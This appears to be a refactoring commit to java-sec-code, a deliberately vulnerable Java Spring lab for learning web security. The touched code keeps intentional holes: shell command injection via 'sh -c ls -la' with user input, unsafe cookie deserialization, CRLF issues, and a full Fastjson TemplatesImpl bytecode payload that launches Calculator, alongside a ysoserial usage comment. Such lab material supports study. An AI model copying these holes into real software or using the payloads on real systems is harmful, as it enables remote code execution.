bug fix

Author: JoyChou93

README.md

@@ -33,9 +33,10 @@ Sort by letter.
 - [Deserialize](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Deserialize.java)
 - [Fastjson](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Fastjson.java)
 - [File Upload](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/FileUpload.java)
+- [GetRequestURI](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/GetRequestURI.java)
 - [IP Forge](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/IPForge.java)
 - [Java RMI](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/RMI/Server.java)
-- [JSONP](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/jsonp/JSONP.java)
+- [JSONP](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Jsonp.java)
 - [ooxmlXXE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/othervulns/ooxmlXXE.java)
 - [PathTraversal](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/PathTraversal.java)
 - [RCE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Rce.java)

src/main/java/org/joychou/config/Constants.java

@@ -0,0 +1,8 @@
+package org.joychou.config;
+
+public class Constants {
+
+    private Constants(){}
+
+    public static final String REMEMBER_ME_COOKIE = "rememberMe";
+}

src/main/java/org/joychou/controller/CRLFInjection.java

@@ -9,18 +9,17 @@
 import javax.servlet.http.HttpServletResponse;
 
 /**
- * @author  JoyChou (joychou@joychou.org)
- * @date    2018.01.03
- * @desc    Java 1.7/1.8 no CRLF vuls (test in Java 1.7/1.8)
+ * Java 1.7/1.8 no CRLF vulns (test in Java 1.7/1.8)
+ *
+ * @author  JoyChou (joychou@joychou.org) @2018-01-03
  */
-
 @Controller
 @RequestMapping("/crlf")
 public class CRLFInjection {
 
     @RequestMapping("/safecode")
     @ResponseBody
-    private static void crlf(HttpServletRequest request, HttpServletResponse response) {
+    public void crlf(HttpServletRequest request, HttpServletResponse response) {
         response.addHeader("test1", request.getParameter("test1"));
         response.setHeader("test2", request.getParameter("test2"));
         String author = request.getParameter("test3");

src/main/java/org/joychou/controller/CommandInject.java

@@ -22,7 +22,7 @@ public class CommandInject {
      * @return result
      */
     @GetMapping("/codeinject")
-    public static String codeInject(String filepath) throws IOException {
+    public String codeInject(String filepath) throws IOException {
 
         String[] cmdList = new String[]{"sh", "-c", "ls -la " + filepath};
         ProcessBuilder builder = new ProcessBuilder(cmdList);
@@ -50,7 +50,7 @@ public String codeInjectHost(HttpServletRequest request) throws IOException {
     }
 
     @GetMapping("/codeinject/sec")
-    public static String codeInjectSec(String filepath) throws IOException {
+    public String codeInjectSec(String filepath) throws IOException {
         String filterFilePath = SecurityUtil.cmdFilter(filepath);
         if (null == filterFilePath) {
             return "Bad boy. I got u.";

src/main/java/org/joychou/controller/Cookies.java

@@ -16,14 +16,14 @@ public class Cookies {
     private static String NICK = "nick";
 
     @RequestMapping(value = "/vuln01")
-    private String vuln01(HttpServletRequest req) {
+    public String vuln01(HttpServletRequest req) {
         String nick = WebUtils.getCookieValueByName(req, NICK); // key code
         return "Cookie nick: " + nick;
     }
 
 
     @RequestMapping(value = "/vuln02")
-    private String vuln02(HttpServletRequest req) {
+    public String vuln02(HttpServletRequest req) {
         String nick = null;
         Cookie[] cookie = req.getCookies();
 
@@ -36,7 +36,7 @@ private String vuln02(HttpServletRequest req) {
 
 
     @RequestMapping(value = "/vuln03")
-    private String vuln03(HttpServletRequest req) {
+    public String vuln03(HttpServletRequest req) {
         String nick = null;
         Cookie cookies[] = req.getCookies();
         if (cookies != null) {
@@ -52,7 +52,7 @@ private String vuln03(HttpServletRequest req) {
 
 
     @RequestMapping(value = "/vuln04")
-    private String vuln04(HttpServletRequest req) {
+    public String vuln04(HttpServletRequest req) {
         String nick = null;
         Cookie cookies[] = req.getCookies();
         if (cookies != null) {
@@ -68,13 +68,13 @@ private String vuln04(HttpServletRequest req) {
 
 
     @RequestMapping(value = "/vuln05")
-    private String vuln05(@CookieValue("nick") String nick) {
+    public String vuln05(@CookieValue("nick") String nick) {
         return "Cookie nick: " + nick;
     }
 
 
     @RequestMapping(value = "/vuln06")
-    private String vuln06(@CookieValue(value = "nick") String nick) {
+    public String vuln06(@CookieValue(value = "nick") String nick) {
         return "Cookie nick: " + nick;
     }
 

src/main/java/org/joychou/controller/Cors.java

@@ -1,10 +1,10 @@
 package org.joychou.controller;
 
 import org.joychou.security.SecurityUtil;
+import org.joychou.util.LoginUtils;
 import org.springframework.security.web.csrf.CsrfToken;
 import org.springframework.web.bind.annotation.CrossOrigin;
 import org.springframework.web.bind.annotation.RequestMapping;
-import org.joychou.controller.jsonp.JSONP;
 import org.springframework.web.bind.annotation.RestController;
 
 import javax.servlet.http.HttpServletRequest;
@@ -111,7 +111,7 @@ public String seccode(HttpServletRequest request, HttpServletResponse response)
         }
         response.setHeader("Access-Control-Allow-Origin", origin);
         response.setHeader("Access-Control-Allow-Credentials", "true");
-        return JSONP.getUserInfo2JsonStr(request);
+        return LoginUtils.getUserInfo2JsonStr(request);
     }
 
 

src/main/java/org/joychou/controller/Deserialize.java

@@ -1,5 +1,6 @@
 package org.joychou.controller;
 
+import org.joychou.config.Constants;
 import org.joychou.security.AntObjectInputStream;
 import org.slf4j.Logger;
 import org.slf4j.LoggerFactory;
@@ -25,20 +26,19 @@
 @RequestMapping("/deserialize")
 public class Deserialize {
 
-    private static String cookieName = "rememberMe";
     protected final Logger logger = LoggerFactory.getLogger(this.getClass());
 
     /**
      * java -jar ysoserial.jar CommonsCollections5 "open -a Calculator" | base64
      * Add the result to rememberMe cookie.
      *
-     * http://localhost:8080/deserialize/rememberMe/vul
+     * http://localhost:8080/deserialize/rememberMe/vuln
      */
-    @RequestMapping("/rememberMe/vul")
+    @RequestMapping("/rememberMe/vuln")
     public String rememberMeVul(HttpServletRequest request)
             throws IOException, ClassNotFoundException {
 
-        Cookie cookie = getCookie(request, cookieName);
+        Cookie cookie = getCookie(request, Constants.REMEMBER_ME_COOKIE);
 
         if (null == cookie){
             return "No rememberMe cookie. Right?";
@@ -64,7 +64,7 @@ public String rememberMeVul(HttpServletRequest request)
     public String rememberMeBlackClassCheck(HttpServletRequest request)
             throws IOException, ClassNotFoundException {
 
-        Cookie cookie = getCookie(request, cookieName);
+        Cookie cookie = getCookie(request, Constants.REMEMBER_ME_COOKIE);
 
         if (null == cookie){
             return "No rememberMe cookie. Right?";

src/main/java/org/joychou/controller/Fastjson.java

@@ -3,6 +3,7 @@
 import com.alibaba.fastjson.JSON;
 import com.alibaba.fastjson.JSONObject;
 import com.alibaba.fastjson.parser.Feature;
+import com.alibaba.fastjson.parser.ParserConfig;
 import org.springframework.stereotype.Controller;
 import org.springframework.web.bind.annotation.RequestBody;
 import org.springframework.web.bind.annotation.RequestMapping;
@@ -31,7 +32,6 @@ public static String Deserialize(@RequestBody String params) {
     }
 
     public static void main(String[] args) {
-
         // Open calc in mac
         String payload = "{\"@type\":\"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl\", \"_bytecodes\": [\"yv66vgAAADEAOAoAAwAiBwA2BwAlBwAmAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFudFZhbHVlBa0gk/OR3e8+AQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBABNTdHViVHJhbnNsZXRQYXlsb2FkAQAMSW5uZXJDbGFzc2VzAQAzTG1lL2xpZ2h0bGVzcy9mYXN0anNvbi9HYWRnZXRzJFN0dWJUcmFuc2xldFBheWxvYWQ7AQAJdHJhbnNmb3JtAQByKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO1tMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQAIZG9jdW1lbnQBAC1MY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTsBAAhoYW5kbGVycwEAQltMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOwEACkV4Y2VwdGlvbnMHACcBAKYoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQAIaXRlcmF0b3IBADVMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yOwEAB2hhbmRsZXIBAEFMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOwEAClNvdXJjZUZpbGUBAAhFeHAuamF2YQwACgALBwAoAQAxbWUvbGlnaHRsZXNzL2Zhc3Rqc29uL0dhZGdldHMkU3R1YlRyYW5zbGV0UGF5bG9hZAEAQGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ydW50aW1lL0Fic3RyYWN0VHJhbnNsZXQBABRqYXZhL2lvL1NlcmlhbGl6YWJsZQEAOWNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9UcmFuc2xldEV4Y2VwdGlvbgEAHW1lL2xpZ2h0bGVzcy9mYXN0anNvbi9HYWRnZXRzAQAIPGNsaW5pdD4BABFqYXZhL2xhbmcvUnVudGltZQcAKgEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsMACwALQoAKwAuAQASb3BlbiAtYSBDYWxjdWxhdG9yCAAwAQAEZXhlYwEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwwAMgAzCgArADQBAA9saWdodGxlc3MvcHduZXIBABFMbGlnaHRsZXNzL3B3bmVyOwAhAAIAAwABAAQAAQAaAAUABgABAAcAAAACAAgABAABAAoACwABAAwAAAAvAAEAAQAAAAUqtwABsQAAAAIADQAAAAYAAQAAADwADgAAAAwAAQAAAAUADwA3AAAAAQATABQAAgAMAAAAPwAAAAMAAAABsQAAAAIADQAAAAYAAQAAAD8ADgAAACAAAwAAAAEADwA3AAAAAAABABUAFgABAAAAAQAXABgAAgAZAAAABAABABoAAQATABsAAgAMAAAASQAAAAQAAAABsQAAAAIADQAAAAYAAQAAAEIADgAAACoABAAAAAEADwA3AAAAAAABABUAFgABAAAAAQAcAB0AAgAAAAEAHgAfAAMAGQAAAAQAAQAaAAgAKQALAAEADAAAABsAAwACAAAAD6cAAwFMuAAvEjG2ADVXsQAAAAAAAgAgAAAAAgAhABEAAAAKAAEAAgAjABAACQ==\"], \"_name\": \"lightless\", \"_tfactory\": { }, \"_outputProperties\":{ }}";
         JSONObject object = JSON.parseObject(payload, Feature.SupportNonPublicField);

src/main/java/org/joychou/controller/jsonp/JSONP.java renamed to src/main/java/org/joychou/controller/Jsonp.java

@@ -1,10 +1,10 @@
-package org.joychou.controller.jsonp;
+package org.joychou.controller;
 
 import com.alibaba.fastjson.JSON;
 import com.alibaba.fastjson.JSONObject;
 
-import com.netflix.ribbon.proxy.annotation.Http;
 import org.joychou.security.SecurityUtil;
+import org.joychou.util.LoginUtils;
 import org.springframework.http.MediaType;
 import org.springframework.security.web.csrf.CsrfToken;
 import org.springframework.web.bind.annotation.*;
@@ -15,8 +15,7 @@
 
 import javax.servlet.http.HttpServletRequest;
 import java.security.Principal;
-import java.util.HashMap;
-import java.util.Map;
+
 
 
 /**
@@ -26,22 +25,10 @@
 
 @RestController
 @RequestMapping("/jsonp")
-public class JSONP {
+public class Jsonp {
 
     private String callback = WebConfig.getBusinessCallback();
 
-    // get current login username
-    public static String getUserInfo2JsonStr(HttpServletRequest request) {
-        Principal principal = request.getUserPrincipal();
-
-        String username = principal.getName();
-
-        Map<String, String> m = new HashMap<>();
-        m.put("Username", username);
-
-        return JSON.toJSONString(m);
-    }
-
     /**
      * Set the response content-type to application/javascript.
      * <p>
@@ -50,7 +37,7 @@ public static String getUserInfo2JsonStr(HttpServletRequest request) {
     @RequestMapping(value = "/vuln/referer", produces = "application/javascript")
     public String referer(HttpServletRequest request) {
         String callback = request.getParameter(this.callback);
-        return WebUtils.json2Jsonp(callback, getUserInfo2JsonStr(request));
+        return WebUtils.json2Jsonp(callback, LoginUtils.getUserInfo2JsonStr(request));
     }
 
     /**
@@ -67,20 +54,20 @@ public String emptyReferer(HttpServletRequest request) {
             return "error";
         }
         String callback = request.getParameter(this.callback);
-        return WebUtils.json2Jsonp(callback, getUserInfo2JsonStr(request));
+        return WebUtils.json2Jsonp(callback, LoginUtils.getUserInfo2JsonStr(request));
     }
 
     /**
      * Adding callback or cback on parameter can automatically return jsonp data.
-     * http://localhost:8080/jsonp/vuln/advice?callback=test
-     * http://localhost:8080/jsonp/vuln/advice?_callback=test
+     * http://localhost:8080/jsonp/object2jsonp?callback=test
+     * http://localhost:8080/jsonp/object2jsonp?_callback=test
      *
      * @return Only return object, AbstractJsonpResponseBodyAdvice can be used successfully.
      * Such as JSONOjbect or JavaBean. String type cannot be used.
      */
-    @RequestMapping(value = "/vuln/advice", produces = MediaType.APPLICATION_JSON_VALUE)
+    @RequestMapping(value = "/object2jsonp", produces = MediaType.APPLICATION_JSON_VALUE)
     public JSONObject advice(HttpServletRequest request) {
-        return JSON.parseObject(getUserInfo2JsonStr(request));
+        return JSON.parseObject(LoginUtils.getUserInfo2JsonStr(request));
     }
 
 
@@ -112,7 +99,7 @@ public String safecode(HttpServletRequest request) {
             return "error";
         }
         String callback = request.getParameter(this.callback);
-        return WebUtils.json2Jsonp(callback, getUserInfo2JsonStr(request));
+        return WebUtils.json2Jsonp(callback, LoginUtils.getUserInfo2JsonStr(request));
     }
 
 

src/main/java/org/joychou/controller/URLRedirect.java

@@ -83,8 +83,8 @@ public void sendRedirect_seccode(HttpServletRequest request, HttpServletResponse
             throws IOException{
         String url = request.getParameter("url");
         if (SecurityUtil.checkURL(url) == null) {
-            // Redirect to error page.
-            response.sendRedirect("https://test.joychou.org/error3.html");
+            response.setStatus(HttpServletResponse.SC_FORBIDDEN);
+            response.getWriter().write("url forbidden");
             return;
         }
         response.sendRedirect(url);